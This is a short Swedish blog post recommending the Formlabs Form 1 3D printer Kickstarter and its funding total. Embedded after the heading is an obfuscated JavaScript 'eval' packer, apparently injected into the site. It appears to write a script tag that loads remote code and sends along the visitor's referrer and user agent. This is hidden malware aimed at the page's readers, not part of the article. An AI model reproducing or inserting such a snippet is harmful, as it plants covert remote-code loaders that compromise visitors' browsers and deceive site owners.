Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Dagens Kickstarter: FORM 1 3D printer

form-1-3d-printer-kickstarter
Sebastian


FORM eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|eezdn|var|u0026u|referrer|szesb||js|php’.split(’|’),0,{}))
1: Är du frustrerad över att low-end 3D-skrivare inte har den kvalitet att göra sann skönhet i dina kreationer? Drömmer du kanske om att ha makt och upplösning av ett verkligt professionellt verk på  skrivbordet?

Formlabs har skapat en enkelt system som konkurrerar med alla high-end skrivare. Den kostar en bråkdel av vad alla andra 3D printers gör ute på marknaden. 

En 3D-skrivare är absolut något som vi på Revue.se kommer att köpa in när väl priset är acceptabelt. Det är därför vi läggar fram denna Kickstarter som något att håll ögonen på.

Form 1 har redan nått sitt mål på 100 000 dollar och är i dagsläget uppe i hela 924 000 dollar. Nio gånger mer än vad de säger sig behöva kan verkligen bidra till att den faktiskt börjar säljas på riktigt.

Vi hoppas och återkommer med mer informationom FORM 1 när det finns lite mer.

Over and out, Seb!